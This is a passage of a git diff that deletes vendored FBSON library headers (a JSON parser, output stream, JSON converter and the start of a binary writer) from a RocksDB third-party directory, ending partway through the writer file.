index 63b03e2..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonJsonParser.h
+++ /dev/null
@@ -1,741 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This file defines FbsonJsonParserT (template) and FbsonJsonParser.
- *
- * FbsonJsonParserT is a template class which implements a JSON parser.
- * FbsonJsonParserT parses JSON text, and serialize it to FBSON binary format
- * by using FbsonWriterT object. By default, FbsonJsonParserT creates a new
- * FbsonWriterT object with an output stream object.  However, you can also
- * pass in your FbsonWriterT or any stream object that implements some basic
- * interface of std::ostream (see FbsonStream.h).
- *
- * FbsonJsonParser specializes FbsonJsonParserT with FbsonOutStream type (see
- * FbsonStream.h). So unless you want to provide own a different output stream
- * type, use FbsonJsonParser object.
- *
- * ** Parsing JSON **
- * FbsonJsonParserT parses JSON string, and directly serializes into FBSON
- * packed bytes. There are three ways to parse a JSON string: (1) using
- * c-string, (2) using string with len, (3) using std::istream object. You can
- * use custome streambuf to redirect output. FbsonOutBuffer is a streambuf used
- * internally if the input is raw character buffer.
- *
- * You can reuse an FbsonJsonParserT object to parse/serialize multiple JSON
- * strings, and the previous FBSON will be overwritten.
- *
- * If parsing fails (returned false), the error code will be set to one of
- * FbsonErrType, and can be retrieved by calling getErrorCode().
- *
- * ** External dictionary **
- * During parsing a JSON string, you can pass a call-back function to map a key
- * string to an id, and store the dictionary id in FBSON to save space. The
- * purpose of using an external dictionary is more towards a collection of
- * documents (which has common keys) rather than a single document, so that
- * space saving will be significant.
- *
- * ** Endianness **
- * Note: FBSON serialization doesn't assume endianness of the server. However
- * you will need to ensure that the endianness at the reader side is the same
- * as that at the writer side (if they are on different machines). Otherwise,
- * proper conversion is needed when a number value is returned to the
- * caller/writer.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONPARSER_H
-#define FBSON_FBSONPARSER_H
-
-#include <cmath>
-#include <limits>
-#include "FbsonDocument.h"
-#include "FbsonWriter.h"
-
-namespace fbson {
-
-const char* const kJsonDelim = " ,]}\t\r\n";
-const char* const kWhiteSpace = " \t\n\r";
-
-/*
- * Error codes
- */
-enum class FbsonErrType {
-  E_NONE = 0,
-  E_INVALID_VER,
-  E_EMPTY_STR,
-  E_OUTPUT_FAIL,
-  E_INVALID_DOCU,
-  E_INVALID_VALUE,
-  E_INVALID_KEY,
-  E_INVALID_STR,
-  E_INVALID_OBJ,
-  E_INVALID_ARR,
-  E_INVALID_HEX,
-  E_INVALID_OCTAL,
-  E_INVALID_DECIMAL,
-  E_INVALID_EXPONENT,
-  E_HEX_OVERFLOW,
-  E_OCTAL_OVERFLOW,
-  E_DECIMAL_OVERFLOW,
-  E_DOUBLE_OVERFLOW,
-  E_EXPONENT_OVERFLOW,
-};
-
-/*
- * Template FbsonJsonParserT
- */
-template <class OS_TYPE>
-class FbsonJsonParserT {
- public:
-  FbsonJsonParserT() : err_(FbsonErrType::E_NONE) {}
-
-  explicit FbsonJsonParserT(OS_TYPE& os)
-      : writer_(os), err_(FbsonErrType::E_NONE) {}
-
-  // parse a UTF-8 JSON string
-  bool parse(const std::string& str, hDictInsert handler = nullptr) {
-    return parse(str.c_str(), (unsigned int)str.size(), handler);
-  }
-
-  // parse a UTF-8 JSON c-style string (NULL terminated)
-  bool parse(const char* c_str, hDictInsert handler = nullptr) {
-    return parse(c_str, (unsigned int)strlen(c_str), handler);
-  }
-
-  // parse a UTF-8 JSON string with length
-  bool parse(const char* pch, unsigned int len, hDictInsert handler = nullptr) {
-    if (!pch || len == 0) {
-      err_ = FbsonErrType::E_EMPTY_STR;
-      return false;
-    }
-
-    FbsonInBuffer sb(pch, len);
-    std::istream in(&sb);
-    return parse(in, handler);
-  }
-
-  // parse UTF-8 JSON text from an input stream
-  bool parse(std::istream& in, hDictInsert handler = nullptr) {
-    bool res = false;
-
-    // reset output stream
-    writer_.reset();
-
-    trim(in);
-
-    if (in.peek() == '{') {
-      in.ignore();
-      res = parseObject(in, handler);
-    } else if (in.peek() == '[') {
-      in.ignore();
-      res = parseArray(in, handler);
-    } else {
-      err_ = FbsonErrType::E_INVALID_DOCU;
-    }
-
-    trim(in);
-    if (res && !in.eof()) {
-      err_ = FbsonErrType::E_INVALID_DOCU;
-      return false;
-    }
-
-    return res;
-  }
-
-  FbsonWriterT<OS_TYPE>& getWriter() { return writer_; }
-
-  FbsonErrType getErrorCode() { return err_; }
-
-  // clear error code
-  void clearErr() { err_ = FbsonErrType::E_NONE; }
-
- private:
-  // parse a JSON object (comma-separated list of key-value pairs)
-  bool parseObject(std::istream& in, hDictInsert handler) {
-    if (!writer_.writeStartObject()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    trim(in);
-
-    if (in.peek() == '}') {
-      in.ignore();
-      // empty object
-      if (!writer_.writeEndObject()) {
-        err_ = FbsonErrType::E_OUTPUT_FAIL;
-        return false;
-      }
-      return true;
-    }
-
-    while (in.good()) {
-      if (in.get() != '"') {
-        err_ = FbsonErrType::E_INVALID_KEY;
-        return false;
-      }
-
-      if (!parseKVPair(in, handler)) {
-        return false;
-      }
-
-      trim(in);
-
-      char ch = in.get();
-      if (ch == '}') {
-        // end of the object
-        if (!writer_.writeEndObject()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      } else if (ch != ',') {
-        err_ = FbsonErrType::E_INVALID_OBJ;
-        return false;
-      }
-
-      trim(in);
-    }
-
-    err_ = FbsonErrType::E_INVALID_OBJ;
-    return false;
-  }
-
-  // parse a JSON array (comma-separated list of values)
-  bool parseArray(std::istream& in, hDictInsert handler) {
-    if (!writer_.writeStartArray()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    trim(in);
-
-    if (in.peek() == ']') {
-      in.ignore();
-      // empty array
-      if (!writer_.writeEndArray()) {
-        err_ = FbsonErrType::E_OUTPUT_FAIL;
-        return false;
-      }
-      return true;
-    }
-
-    while (in.good()) {
-      if (!parseValue(in, handler)) {
-        return false;
-      }
-
-      trim(in);
-
-      char ch = in.get();
-      if (ch == ']') {
-        // end of the array
-        if (!writer_.writeEndArray()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      } else if (ch != ',') {
-        err_ = FbsonErrType::E_INVALID_ARR;
-        return false;
-      }
-
-      trim(in);
-    }
-
-    err_ = FbsonErrType::E_INVALID_ARR;
-    return false;
-  }
-
-  // parse a key-value pair, separated by ":"
-  bool parseKVPair(std::istream& in, hDictInsert handler) {
-    if (parseKey(in, handler) && parseValue(in, handler)) {
-      return true;
-    }
-
-    return false;
-  }
-
-  // parse a key (must be string)
-  bool parseKey(std::istream& in, hDictInsert handler) {
-    char key[FbsonKeyValue::sMaxKeyLen];
-    int i = 0;
-    while (in.good() && in.peek() != '"' && i < FbsonKeyValue::sMaxKeyLen) {
-      key[i++] = in.get();
-    }
-
-    if (!in.good() || in.peek() != '"' || i == 0) {
-      err_ = FbsonErrType::E_INVALID_KEY;
-      return false;
-    }
-
-    in.ignore(); // discard '"'
-
-    int key_id = -1;
-    if (handler) {
-      key_id = handler(key, i);
-    }
-
-    if (key_id < 0) {
-      writer_.writeKey(key, i);
-    } else {
-      writer_.writeKey(key_id);
-    }
-
-    trim(in);
-
-    if (in.get() != ':') {
-      err_ = FbsonErrType::E_INVALID_OBJ;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a value
-  bool parseValue(std::istream& in, hDictInsert handler) {
-    bool res = false;
-
-    trim(in);
-
-    switch (in.peek()) {
-    case 'N':
-    case 'n': {
-      in.ignore();
-      res = parseNull(in);
-      break;
-    }
-    case 'T':
-    case 't': {
-      in.ignore();
-      res = parseTrue(in);
-      break;
-    }
-    case 'F':
-    case 'f': {
-      in.ignore();
-      res = parseFalse(in);
-      break;
-    }
-    case '"': {
-      in.ignore();
-      res = parseString(in);
-      break;
-    }
-    case '{': {
-      in.ignore();
-      res = parseObject(in, handler);
-      break;
-    }
-    case '[': {
-      in.ignore();
-      res = parseArray(in, handler);
-      break;
-    }
-    default: {
-      res = parseNumber(in);
-      break;
-    }
-    }
-
-    return res;
-  }
-
-  // parse NULL value
-  bool parseNull(std::istream& in) {
-    if (tolower(in.get()) == 'u' && tolower(in.get()) == 'l' &&
-        tolower(in.get()) == 'l') {
-      writer_.writeNull();
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse TRUE value
-  bool parseTrue(std::istream& in) {
-    if (tolower(in.get()) == 'r' && tolower(in.get()) == 'u' &&
-        tolower(in.get()) == 'e') {
-      writer_.writeBool(true);
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse FALSE value
-  bool parseFalse(std::istream& in) {
-    if (tolower(in.get()) == 'a' && tolower(in.get()) == 'l' &&
-        tolower(in.get()) == 's' && tolower(in.get()) == 'e') {
-      writer_.writeBool(false);
-      return true;
-    }
-
-    err_ = FbsonErrType::E_INVALID_VALUE;
-    return false;
-  }
-
-  // parse a string
-  bool parseString(std::istream& in) {
-    if (!writer_.writeStartString()) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    bool escaped = false;
-    char buffer[4096]; // write 4KB at a time
-    int nread = 0;
-    while (in.good()) {
-      char ch = in.get();
-      if (ch != '"' || escaped) {
-        buffer[nread++] = ch;
-        if (nread == 4096) {
-          // flush buffer
-          if (!writer_.writeString(buffer, nread)) {
-            err_ = FbsonErrType::E_OUTPUT_FAIL;
-            return false;
-          }
-          nread = 0;
-        }
-        // set/reset escape
-        if (ch == '\\' || escaped) {
-          escaped = !escaped;
-        }
-      } else {
-        // write all remaining bytes in the buffer
-        if (nread > 0) {
-          if (!writer_.writeString(buffer, nread)) {
-            err_ = FbsonErrType::E_OUTPUT_FAIL;
-            return false;
-          }
-        }
-        // end writing string
-        if (!writer_.writeEndString()) {
-          err_ = FbsonErrType::E_OUTPUT_FAIL;
-          return false;
-        }
-        return true;
-      }
-    }
-
-    err_ = FbsonErrType::E_INVALID_STR;
-    return false;
-  }
-
-  // parse a number
-  // Number format can be hex, octal, or decimal (including float).
-  // Only decimal can have (+/-) sign prefix.
-  bool parseNumber(std::istream& in) {
-    bool ret = false;
-    switch (in.peek()) {
-    case '0': {
-      in.ignore();
-
-      if (in.peek() == 'x' || in.peek() == 'X') {
-        in.ignore();
-        ret = parseHex(in);
-      } else if (in.peek() == '.') {
-        in.ignore();
-        ret = parseDouble(in, 0, 0, 1);
-      } else {
-        ret = parseOctal(in);
-      }
-
-      break;
-    }
-    case '-': {
-      in.ignore();
-      ret = parseDecimal(in, -1);
-      break;
-    }
-    case '+':
-      in.ignore();
-    // fall through
-    default:
-      ret = parseDecimal(in, 1);
-      break;
-    }
-
-    return ret;
-  }
-
-  // parse a number in hex format
-  bool parseHex(std::istream& in) {
-    uint64_t val = 0;
-    int num_digits = 0;
-    char ch = tolower(in.peek());
-    while (in.good() && !strchr(kJsonDelim, ch) && (++num_digits) <= 16) {
-      if (ch >= '0' && ch <= '9') {
-        val = (val << 4) + (ch - '0');
-      } else if (ch >= 'a' && ch <= 'f') {
-        val = (val << 4) + (ch - 'a' + 10);
-      } else { // unrecognized hex digit
-        err_ = FbsonErrType::E_INVALID_HEX;
-        return false;
-      }
-
-      in.ignore();
-      ch = tolower(in.peek());
-    }
-
-    int size = 0;
-    if (num_digits <= 2) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (num_digits <= 4) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (num_digits <= 8) {
-      size = writer_.writeInt32((int32_t)val);
-    } else if (num_digits <= 16) {
-      size = writer_.writeInt64(val);
-    } else {
-      err_ = FbsonErrType::E_HEX_OVERFLOW;
-      return false;
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a number in octal format
-  bool parseOctal(std::istream& in) {
-    int64_t val = 0;
-    char ch = in.peek();
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '7') {
-        val = val * 8 + (ch - '0');
-      } else {
-        err_ = FbsonErrType::E_INVALID_OCTAL;
-        return false;
-      }
-
-      // check if the number overflows
-      if (val < 0) {
-        err_ = FbsonErrType::E_OCTAL_OVERFLOW;
-        return false;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    int size = 0;
-    if (val <= std::numeric_limits<int8_t>::max()) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (val <= std::numeric_limits<int16_t>::max()) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (val <= std::numeric_limits<int32_t>::max()) {
-      size = writer_.writeInt32((int32_t)val);
-    } else { // val <= INT64_MAX
-      size = writer_.writeInt64(val);
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse a number in decimal (including float)
-  bool parseDecimal(std::istream& in, int sign) {
-    int64_t val = 0;
-    int precision = 0;
-
-    char ch = 0;
-    while (in.good() && (ch = in.peek()) == '0')
-      in.ignore();
-
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        val = val * 10 + (ch - '0');
-        ++precision;
-      } else if (ch == '.') {
-        // note we don't pop out '.'
-        return parseDouble(in, static_cast<double>(val), precision, sign);
-      } else {
-        err_ = FbsonErrType::E_INVALID_DECIMAL;
-        return false;
-      }
-
-      in.ignore();
-
-      // if the number overflows int64_t, first parse it as double iff we see a
-      // decimal point later. Otherwise, will treat it as overflow
-      if (val < 0 && val > std::numeric_limits<int64_t>::min()) {
-        return parseDouble(in, static_cast<double>(val), precision, sign);
-      }
-
-      ch = in.peek();
-    }
-
-    if (sign < 0) {
-      val = -val;
-    }
-
-    int size = 0;
-    if (val >= std::numeric_limits<int8_t>::min() &&
-        val <= std::numeric_limits<int8_t>::max()) {
-      size = writer_.writeInt8((int8_t)val);
-    } else if (val >= std::numeric_limits<int16_t>::min() &&
-               val <= std::numeric_limits<int16_t>::max()) {
-      size = writer_.writeInt16((int16_t)val);
-    } else if (val >= std::numeric_limits<int32_t>::min() &&
-               val <= std::numeric_limits<int32_t>::max()) {
-      size = writer_.writeInt32((int32_t)val);
-    } else { // val <= INT64_MAX
-      size = writer_.writeInt64(val);
-    }
-
-    if (size == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse IEEE745 double precision:
-  // Significand precision length - 15
-  // Maximum exponent value - 308
-  //
-  // "If a decimal string with at most 15 significant digits is converted to
-  // IEEE 754 double precision representation and then converted back to a
-  // string with the same number of significant digits, then the final string
-  // should match the original"
-  bool parseDouble(std::istream& in, double val, int precision, int sign) {
-    int integ = precision;
-    int frac = 0;
-    bool is_frac = false;
-
-    char ch = in.peek();
-    if (ch == '.') {
-      is_frac = true;
-      in.ignore();
-      ch = in.peek();
-    }
-
-    int exp = 0;
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        if (precision < 15) {
-          val = val * 10 + (ch - '0');
-          if (is_frac) {
-            ++frac;
-          } else {
-            ++integ;
-          }
-          ++precision;
-        } else if (!is_frac) {
-          ++exp;
-        }
-      } else if (ch == 'e' || ch == 'E') {
-        in.ignore();
-        int exp2;
-        if (!parseExponent(in, exp2)) {
-          return false;
-        }
-
-        exp += exp2;
-        // check if exponent overflows
-        if (exp > 308 || exp < -308) {
-          err_ = FbsonErrType::E_EXPONENT_OVERFLOW;
-          return false;
-        }
-
-        is_frac = true;
-        break;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    if (!is_frac) {
-      err_ = FbsonErrType::E_DECIMAL_OVERFLOW;
-      return false;
-    }
-
-    val *= std::pow(10, exp - frac);
-    if (std::isnan(val) || std::isinf(val)) {
-      err_ = FbsonErrType::E_DOUBLE_OVERFLOW;
-      return false;
-    }
-
-    if (sign < 0) {
-      val = -val;
-    }
-
-    if (writer_.writeDouble(val) == 0) {
-      err_ = FbsonErrType::E_OUTPUT_FAIL;
-      return false;
-    }
-
-    return true;
-  }
-
-  // parse the exponent part of a double number
-  bool parseExponent(std::istream& in, int& exp) {
-    bool neg = false;
-
-    char ch = in.peek();
-    if (ch == '+') {
-      in.ignore();
-      ch = in.peek();
-    } else if (ch == '-') {
-      neg = true;
-      in.ignore();
-      ch = in.peek();
-    }
-
-    exp = 0;
-    while (in.good() && !strchr(kJsonDelim, ch)) {
-      if (ch >= '0' && ch <= '9') {
-        exp = exp * 10 + (ch - '0');
-      } else {
-        err_ = FbsonErrType::E_INVALID_EXPONENT;
-        return false;
-      }
-
-      if (exp > 308) {
-        err_ = FbsonErrType::E_EXPONENT_OVERFLOW;
-        return false;
-      }
-
-      in.ignore();
-      ch = in.peek();
-    }
-
-    if (neg) {
-      exp = -exp;
-    }
-
-    return true;
-  }
-
-  void trim(std::istream& in) {
-    while (in.good() && strchr(kWhiteSpace, in.peek())) {
-      in.ignore();
-    }
-  }
-
- private:
-  FbsonWriterT<OS_TYPE> writer_;
-  FbsonErrType err_;
-};
-
-typedef FbsonJsonParserT<FbsonOutStream> FbsonJsonParser;
-
-} // namespace fbson
-
-#endif // FBSON_FBSONPARSER_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonStream.h b/thirdparty/rocksdb/third-party/fbson/FbsonStream.h
deleted file mode 100644
index 12723ea..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonStream.h
+++ /dev/null
@@ -1,182 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header file defines FbsonInBuffer and FbsonOutStream classes.
- *
- * ** Input Buffer **
- * FbsonInBuffer is a customer input buffer to wrap raw character buffer. Its
- * object instances are used to create std::istream objects interally.
- *
- * ** Output Stream **
- * FbsonOutStream is a custom output stream classes, to contain the FBSON
- * serialized binary. The class is conveniently used to specialize templates of
- * FbsonParser and FbsonWriter.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONSTREAM_H
-#define FBSON_FBSONSTREAM_H
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#if defined OS_WIN && !defined snprintf
-#define snprintf _snprintf
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-
-namespace fbson {
-
-// lengths includes sign
-#define MAX_INT_DIGITS 11
-#define MAX_INT64_DIGITS 20
-#define MAX_DOUBLE_DIGITS 23 // 1(sign)+16(significant)+1(decimal)+5(exponent)
-
-/*
- * FBSON's implementation of input buffer
- */
-class FbsonInBuffer : public std::streambuf {
- public:
-  FbsonInBuffer(const char* str, uint32_t len) {
-    // this is read buffer and the str will not be changed
-    // so we use const_cast (ugly!) to remove constness
-    char* pch(const_cast<char*>(str));
-    setg(pch, pch, pch + len);
-  }
-};
-
-/*
- * FBSON's implementation of output stream.
- *
- * This is a wrapper of a char buffer. By default, the buffer capacity is 1024
- * bytes. We will double the buffer if realloc is needed for writes.
- */
-class FbsonOutStream : public std::ostream {
- public:
-  explicit FbsonOutStream(uint32_t capacity = 1024)
-      : std::ostream(nullptr),
-        head_(nullptr),
-        size_(0),
-        capacity_(capacity),
-        alloc_(true) {
-    if (capacity_ == 0) {
-      capacity_ = 1024;
-    }
-
-    head_ = (char*)malloc(capacity_);
-  }
-
-  FbsonOutStream(char* buffer, uint32_t capacity)
-      : std::ostream(nullptr),
-        head_(buffer),
-        size_(0),
-        capacity_(capacity),
-        alloc_(false) {
-    assert(buffer && capacity_ > 0);
-  }
-
-  ~FbsonOutStream() {
-    if (alloc_) {
-      free(head_);
-    }
-  }
-
-  void put(char c) { write(&c, 1); }
-
-  void write(const char* c_str) { write(c_str, (uint32_t)strlen(c_str)); }
-
-  void write(const char* bytes, uint32_t len) {
-    if (len == 0)
-      return;
-
-    if (size_ + len > capacity_) {
-      realloc(len);
-    }
-
-    memcpy(head_ + size_, bytes, len);
-    size_ += len;
-  }
-
-  // write the integer to string
-  void write(int i) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_INT_DIGITS + 1 > capacity_) {
-      realloc(MAX_INT_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_INT_DIGITS + 1, "%d", i);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  // write the 64bit integer to string
-  void write(int64_t l) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_INT64_DIGITS + 1 > capacity_) {
-      realloc(MAX_INT64_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_INT64_DIGITS + 1, "%" PRIi64, l);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  // write the double to string
-  void write(double d) {
-    // snprintf automatically adds a NULL, so we need one more char
-    if (size_ + MAX_DOUBLE_DIGITS + 1 > capacity_) {
-      realloc(MAX_DOUBLE_DIGITS + 1);
-    }
-
-    int len = snprintf(head_ + size_, MAX_DOUBLE_DIGITS + 1, "%.15g", d);
-    assert(len > 0);
-    size_ += len;
-  }
-
-  pos_type tellp() const { return size_; }
-
-  void seekp(pos_type pos) { size_ = (uint32_t)pos; }
-
-  const char* getBuffer() const { return head_; }
-
-  pos_type getSize() const { return tellp(); }
-
- private:
-  void realloc(uint32_t len) {
-    assert(capacity_ > 0);
-
-    capacity_ *= 2;
-    while (capacity_ < size_ + len) {
-      capacity_ *= 2;
-    }
-
-    if (alloc_) {
-      char* new_buf = (char*)::realloc(head_, capacity_);
-      assert(new_buf);
-      head_ = new_buf;
-    } else {
-      char* new_buf = (char*)::malloc(capacity_);
-      assert(new_buf);
-      memcpy(new_buf, head_, size_);
-      head_ = new_buf;
-      alloc_ = true;
-    }
-  }
-
- private:
-  char* head_;
-  uint32_t size_;
-  uint32_t capacity_;
-  bool alloc_;
-};
-
-} // namespace fbson
-
-#endif // FBSON_FBSONSTREAM_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h b/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h
deleted file mode 100644
index 2b6d6f5..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonUtil.h
+++ /dev/null
@@ -1,163 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header file defines miscellaneous utility classes.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONUTIL_H
-#define FBSON_FBSONUTIL_H
-
-#include <sstream>
-#include "FbsonDocument.h"
-
-namespace fbson {
-
-#define OUT_BUF_SIZE 1024
-
-/*
- * FbsonToJson converts an FbsonValue object to a JSON string.
- */
-class FbsonToJson {
- public:
-  FbsonToJson() : os_(buffer_, OUT_BUF_SIZE) {}
-
-  // get json string
-  const char* json(const FbsonValue* pval) {
-    os_.clear();
-    os_.seekp(0);
-
-    if (pval) {
-      intern_json(pval);
-    }
-
-    os_.put(0);
-    return os_.getBuffer();
-  }
-
- private:
-  // recursively convert FbsonValue
-  void intern_json(const FbsonValue* val) {
-    switch (val->type()) {
-    case FbsonType::T_Null: {
-      os_.write("null", 4);
-      break;
-    }
-    case FbsonType::T_True: {
-      os_.write("true", 4);
-      break;
-    }
-    case FbsonType::T_False: {
-      os_.write("false", 5);
-      break;
-    }
-    case FbsonType::T_Int8: {
-      os_.write(((Int8Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int16: {
-      os_.write(((Int16Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int32: {
-      os_.write(((Int32Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Int64: {
-      os_.write(((Int64Val*)val)->val());
-      break;
-    }
-    case FbsonType::T_Double: {
-      os_.write(((DoubleVal*)val)->val());
-      break;
-    }
-    case FbsonType::T_String: {
-      os_.put('"');
-      os_.write(((StringVal*)val)->getBlob(), ((StringVal*)val)->getBlobLen());
-      os_.put('"');
-      break;
-    }
-    case FbsonType::T_Binary: {
-      os_.write("\"<BINARY>", 9);
-      os_.write(((BinaryVal*)val)->getBlob(), ((BinaryVal*)val)->getBlobLen());
-      os_.write("<BINARY>\"", 9);
-      break;
-    }
-    case FbsonType::T_Object: {
-      object_to_json((ObjectVal*)val);
-      break;
-    }
-    case FbsonType::T_Array: {
-      array_to_json((ArrayVal*)val);
-      break;
-    }
-    default:
-      break;
-    }
-  }
-
-  // convert object
-  void object_to_json(const ObjectVal* val) {
-    os_.put('{');
-
-    auto iter = val->begin();
-    auto iter_fence = val->end();
-
-    while (iter < iter_fence) {
-      // write key
-      if (iter->klen()) {
-        os_.put('"');
-        os_.write(iter->getKeyStr(), iter->klen());
-        os_.put('"');
-      } else {
-        os_.write(iter->getKeyId());
-      }
-      os_.put(':');
-
-      // convert value
-      intern_json(iter->value());
-
-      ++iter;
-      if (iter != iter_fence) {
-        os_.put(',');
-      }
-    }
-
-    assert(iter == iter_fence);
-
-    os_.put('}');
-  }
-
-  // convert array to json
-  void array_to_json(const ArrayVal* val) {
-    os_.put('[');
-
-    auto iter = val->begin();
-    auto iter_fence = val->end();
-
-    while (iter != iter_fence) {
-      // convert value
-      intern_json((const FbsonValue*)iter);
-      ++iter;
-      if (iter != iter_fence) {
-        os_.put(',');
-      }
-    }
-
-    assert(iter == iter_fence);
-
-    os_.put(']');
-  }
-
- private:
-  FbsonOutStream os_;
-  char buffer_[OUT_BUF_SIZE];
-};
-
-} // namespace fbson
-
-#endif // FBSON_FBSONUTIL_H
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h b/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h
deleted file mode 100644
index a254e9b..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonWriter.h
+++ /dev/null
@@ -1,430 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This file defines FbsonWriterT (template) and FbsonWriter.
- *
- * FbsonWriterT is a template class which implements an FBSON serializer.
- * Users call various write functions of FbsonWriterT object to write values
- * directly to FBSON packed bytes. All write functions of value or key return
- * the number of bytes written to FBSON, or 0 if there is an error. To write an
- * object, an array, or a string, you must call writeStart[..] before writing
- * values or key, and call writeEnd[..] after finishing at the end.
- *
- * By default, an FbsonWriterT object creates an output stream buffer.
- * Alternatively, you can also pass any output stream object to a writer, as
- * long as the stream object implements some basic functions of std::ostream
- * (such as FbsonOutStream, see FbsonStream.h).
- *
- * FbsonWriter specializes FbsonWriterT with FbsonOutStream type (see
- * FbsonStream.h). So unless you want to provide own a different output stream
- * type, use FbsonParser object.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONWRITER_H
-#define FBSON_FBSONWRITER_H
-
-#include <stack>
-#include "FbsonDocument.h"
-#include "FbsonStream.h"
-
-namespace fbson {
-
-template <class OS_TYPE>
-class FbsonWriterT {
- public:
-  FbsonWriterT()
-      : alloc_(true), hasHdr_(false), kvState_(WS_Value), str_pos_(0) {
-    os_ = new OS_TYPE();
-  }
-
-  explicit FbsonWriterT(OS_TYPE& os)
-      : os_(&os),
-        alloc_(false),
-        hasHdr_(false),
-        kvState_(WS_Value),
-        str_pos_(0) {}
-
-  ~FbsonWriterT() {
-    if (alloc_) {
-      delete os_;
-    }
-  }
-
-  void reset() {
-    os_->clear();
-    os_->seekp(0);
-    hasHdr_ = false;
-    kvState_ = WS_Value;
-    for (; !stack_.empty(); stack_.pop())
-      ;
-  }
-
-  // write a key string (or key id if an external dict is provided)
-  uint32_t writeKey(const char* key,
-                    uint8_t len,
-                    hDictInsert handler = nullptr) {
-    if (len && !stack_.empty() && verifyKeyState()) {
-      int key_id = -1;
-      if (handler) {
-        key_id = handler(key, len);
-      }
-
-      uint32_t size = sizeof(uint8_t);
-      if (key_id < 0) {
-        os_->put(len);
-        os_->write(key, len);
-        size += len;
-      } else if (key_id <= FbsonKeyValue::sMaxKeyId) {
-        FbsonKeyValue::keyid_type idx = key_id;
-        os_->put(0);
-        os_->write((char*)&idx, sizeof(FbsonKeyValue::keyid_type));
-        size += sizeof(FbsonKeyValue::keyid_type);
-      } else { // key id overflow
-        assert(0);
-        return 0;
-      }
-
-      kvState_ = WS_Key;
-      return size;
-    }
-
-    return 0;
-  }
-
-  // write a key id
-  uint32_t writeKey(FbsonKeyValue::keyid_type idx) {
-    if (!stack_.empty() && verifyKeyState()) {
-      os_->put(0);
-      os_->write((char*)&idx, sizeof(FbsonKeyValue::keyid_type));
-      kvState_ = WS_Key;
-      return sizeof(uint8_t) + sizeof(FbsonKeyValue::keyid_type);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeNull() {
-    if (!stack_.empty() && verifyValueState()) {
-      os_->put((FbsonTypeUnder)FbsonType::T_Null);
-      kvState_ = WS_Value;
-      return sizeof(FbsonValue);
-    }
-
-    return 0;
-  }
-
-  uint32_t writeBool(bool b) {
-    if (!stack_.empty() && verifyValueState()) {
-      if (b) {
-        os_->put((FbsonTypeUnder)FbsonType::T_True);
